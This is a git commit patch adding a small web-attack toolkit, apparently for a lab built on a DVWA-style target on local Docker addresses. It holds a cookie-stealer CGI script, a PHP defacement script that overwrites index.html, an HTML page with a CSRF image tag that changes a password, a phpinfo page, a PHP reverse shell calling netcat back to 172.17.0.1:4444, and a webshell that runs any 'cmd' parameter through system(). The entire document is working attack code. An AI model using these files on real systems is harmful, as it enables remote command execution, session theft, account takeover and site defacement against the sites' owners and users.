From 2585495cfab54366a668777216b88a4f4b686102 Mon Sep 17 00:00:00 2001
From: jerome <jerome@xlinfo.fr>
Date: Tue, 19 Sep 2023 17:02:40 +0200
Subject: commit initial

---
 cgi-bin/voleurCookie.cgi |  11 +++++++++++
 defacage.php             |  15 +++++++++++++++
 hack.jpeg                | Bin 0 -> 4807 bytes
 hack.png                 | Bin 0 -> 4364 bytes
 index_tpl.html           |  13 +++++++++++++
 log.txt                  |   0
 phpinfo.php              |   3 +++
 reverseshell.php         |   3 +++
 webshell.php             |  19 +++++++++++++++++++
 9 files changed, 64 insertions(+)
 create mode 100755 cgi-bin/voleurCookie.cgi
 create mode 100644 defacage.php
 create mode 100644 hack.jpeg
 create mode 100644 hack.png
 create mode 100644 index_tpl.html
 create mode 100644 log.txt
 create mode 100644 phpinfo.php
 create mode 100644 reverseshell.php
 create mode 100644 webshell.php

diff --git a/cgi-bin/voleurCookie.cgi b/cgi-bin/voleurCookie.cgi
new file mode 100755
index 0000000..db17db7
--- /dev/null
+++ b/cgi-bin/voleurCookie.cgi
@@ -0,0 +1,11 @@
+#!/usr/bin/env python3
+import cgi
+import datetime
+import os
+
+print(os.system("whoami"))
+
+form = cgi.FieldStorage()
+cookies =form.getvalue('c')
+with open("log.txt", "a") as fichier:
+    fichier.write("\n"+str(datetime.datetime.now())+" "+cookies)
diff --git a/defacage.php b/defacage.php
new file mode 100644
index 0000000..48f73ad
--- /dev/null
+++ b/defacage.php
@@ -0,0 +1,15 @@
+<?php
+$html='
+<!DOCTYPE html>
+<head>
+<meta charset="UTF-8">
+<title>HaCkÉ pAr BIbi</title>
+</head>
+<body>
+<h1>T\'es HaCkÉ par bIbI! </h1>
+<img src="http://172.17.0.1/hack.jpeg" alt="" />
+</body>
+</html>';
+$fp = fopen('../../index.html', 'w+');
+fwrite($fp, $html);
+fclose($fp);
diff --git a/hack.jpeg b/hack.jpeg
new file mode 100644
index 0000000..bf41bc7
Binary files /dev/null and b/hack.jpeg differ
diff --git a/hack.png b/hack.png
new file mode 100644
index 0000000..dbd2be8
Binary files /dev/null and b/hack.png differ
diff --git a/index_tpl.html b/index_tpl.html
new file mode 100644
index 0000000..e613012
--- /dev/null
+++ b/index_tpl.html
@@ -0,0 +1,13 @@
+<!DOCTYPE html>
+<html>
+<head>
+<meta charset="UTF-8">
+<title>HaCkÉ pAr BIbi</title>
+</head>
+<body>
+<h1>T'es HaCkÉ par bIbI! </h1>
+<img src="http://172.17.0.1/hack.jpeg" alt="" />
+<img src="http://172.17.0.2/vulnerabilities/csrf/?password_new=newpass&password_conf=newpass&Change=Change" />
+</body>
+</html>
+
diff --git a/log.txt b/log.txt
new file mode 100644
index 0000000..e69de29
diff --git a/phpinfo.php b/phpinfo.php
new file mode 100644
index 0000000..cf60860
--- /dev/null
+++ b/phpinfo.php
@@ -0,0 +1,3 @@
+<?php
+phpinfo();
+?>
diff --git a/reverseshell.php b/reverseshell.php
new file mode 100644
index 0000000..754c35d
--- /dev/null
+++ b/reverseshell.php
@@ -0,0 +1,3 @@
+<?php
+exec("nc 172.17.0.1 4444 -e /bin/bash >/dev/null &");
+?>
diff --git a/webshell.php b/webshell.php
new file mode 100644
index 0000000..679bb7a
--- /dev/null
+++ b/webshell.php
@@ -0,0 +1,19 @@
+<!DOCTYPE html>
+<html>
+<head>
+<title>Web shell</title>
+</head>
+<body>
+<h1>Web shell</h1>
+<p>Votre commande :
+<?php if (isset($_GET['cmd'])) echo $_GET['cmd'] ?>
+</p>
+<form>
+<input type="text" name="cmd" autofocus />
+<input type="submit" />
+</form>
+<pre>
+<?php if (isset($_GET['cmd'])) system($_GET['cmd']) ?>
+</pre>
+</body>
+</html>
-- 
cgit v1.2.3